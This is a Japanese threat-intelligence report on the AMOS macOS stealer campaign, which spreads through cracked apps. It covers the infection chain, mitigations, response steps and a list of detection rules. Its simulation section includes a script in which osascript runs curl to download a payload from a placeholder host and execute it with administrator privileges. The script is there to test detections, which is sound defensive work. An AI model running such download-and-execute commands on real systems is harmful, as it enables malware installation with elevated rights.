AMOS スティーラーは「クラックされた」アプリを通じて macOS を標的に
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
このレポートでは、Atomic macOS Stealer(AMOS)を配信するキャンペーンについて説明しています。これはクラッキングされたアプリケーションとして偽装されるか、ユーザーにコピー&ペーストの端末コマンドを実行させることによって行われます。実行されると、マルウェアは資格情報、ブラウザ情報、暗号通貨ウォレット、メッセージングアプリケーションのファイル、VPNプロファイル、個人のドキュメントを含む幅広い機密データを収集し、HTTPまたはHTTPS経由で盗まれたコンテンツを抽出します。静的検出を避けるために、運営者はキャンペーンの全体を通じてドメインとURLを回転させます。この活動は、特に非公式または海賊版ソフトウェアを探しているmacOSユーザーを対象としています。
調査
Trend Vision Oneテレメトリを使用して、感染の全過程を再構築しました。これは、 haxmac.ccからのクラッキングされたアプリケーションのダウンロードから始まり、仲介ドメインを介したリダイレクト、悪意のあるシェルスクリプトの実行、持続性のための起動デーモンの作成、 /tmpへのデータのステージング、ZIPアーカイブへの圧縮、および回転する攻撃者に制御されたドメインへのエクスフィルトレーションに至ります。研究者は、それぞれの妥協段階に関連するコマンドライン、ファイルパス、行動指標をキャプチャしました。
緩和策
組織は、クラッキングされたソフトウェアやコピー&ペースト端末コマンドのリスクについてユーザーを教育し、Gatekeeperおよび公証のコントロールを施行し、macOSシステムでの不要なスクリプト実行を制限する必要があります。また、ディフェンダーは疑わしい curl and osascript の活動を監視し、既知の悪意のあるドメインおよびIPアドレスへのアクセスをブロックする必要があります。エンドポイント検出は、無許可の起動デーモン作成、隠しファイルの配置、または異常なファイルの収集やエクスフィルトレーションの行動に焦点を当てるべきです。
対応策
AMOSの活動が検出された場合、影響を受けたエンドポイントを隔離し、悪意のあるプロセスを終了し、隠されたファイルを削除する必要があります。 .helper, .agent、および com.finder.helper.plistのようなファイルを削除し、エクスポート用に準備されたデータステージを削除します。妥協された資格情報は撤回され、回復したアーカイブのフォレンジック分析が実行されるべきです。特定された悪意のあるインフラストラクチャはブロックされ、観察されたコマンドパターンを監視するために検出コンテンツを更新する必要があります。
攻撃フロー
検出
Dittoの不審な使用:macOSでのファイルアーカイブとエクスフィルトレーション(プロセス生成経由)
表示
TMPディレクトリ内での複数ファイルステージングの可能性(ファイルイベント経由)
表示
Atomic MacOS Stealer – FileGrabber 活動
表示
ChromeログインデータがTMPディレクトリにコピーされた可能性(プロセス生成経由)
表示
IOCs(HashSha1)を検出するためのAMOS Stealerキャンペーン分析:クラッキングされたアプリを通じてmacOSを標的に
表示
IOCs(SourceIP)を検出するためのAMOS Stealerキャンペーン分析:クラッキングされたアプリを通じてmacOSを標的に
表示
IOCs(DestinationIP)を検出するためのAMOS Stealerキャンペーン分析:クラッキングされたアプリを通じてmacOSを標的に
表示
macOSにおけるAMOS Stealer実行の端末コマンド経由の検出 [Linux プロセス生成]
表示
macOSにおけるAMOS Stealer実行のAppleScriptとCurl経由の検出 [Linux プロセス生成]
表示
シミュレーションの実行
前提条件:テレメトリ&ベースラインプレフライトチェックが完了していること。
根拠:このセクションでは、攻撃者の技術(TTP)を引き金にして検出ルールを発動させるための正確な実行を詳細に説明します。コマンドと説明は、識別されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的とします。抽象的または無関連な例は誤診につながります。
-
攻撃のストーリー&コマンド:
攻撃者は、ショートAppleScriptペイロードを配信するフィッシングルアーを取得しました。スクリプトは、osascriptを使用してシェルコマンドを実行し(sh -c)、curlを呼び出して、悪意のあるC2サーバーからAMOS スティーラーのバイナリをダウンロードし、ユーザーの~/Library/Application Support/フォルダに保存し、その後、より高い権限で実行します。osascript(署名済Appleバイナリ)を使用することで、この活動を合法的な自動化のように見せかけ、さらにcurlによりステルスなネットワークダウンロードが行われます。 -
回帰テストスクリプト:
# amos_stealer_simulation.sh # osascript + curlを使用してmacOSでAMOSスティーラーの実行をシミュレート # 1. 悪意のあるURLを定義する(安全のためには無害なプレースホルダを使用) MALICIOUS_URL="https://example.com/malicious_payload.sh" # 2. AppleScriptがペイロードをダウンロード&実行するシェルコマンドを実行 APPLESCRIPT=$(cat <<'EOF' do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges EOF ) # 3. osascriptを介してAppleScriptを実行 echo "$APPLESCRIPT" | osascript # 4. ペイロードが実行されるまで少し待つ sleep 5 -
クリーンアップコマンド:
# cleanup_amos_simulation.sh # シミュレーションによって作成されたアーティファクトを削除 # ダウンロードされたペイロードを削除 rm -f /tmp/payload.sh # 一時的に昇格したプロセスがまだ実行中の場合は取消し pkill -f "/tmp/payload.sh" || true # 任意で、AppleScript実行履歴をクリア # (macOSはosascriptに対する持続的な履歴を保持しません) echo "クリーンアップ完了。"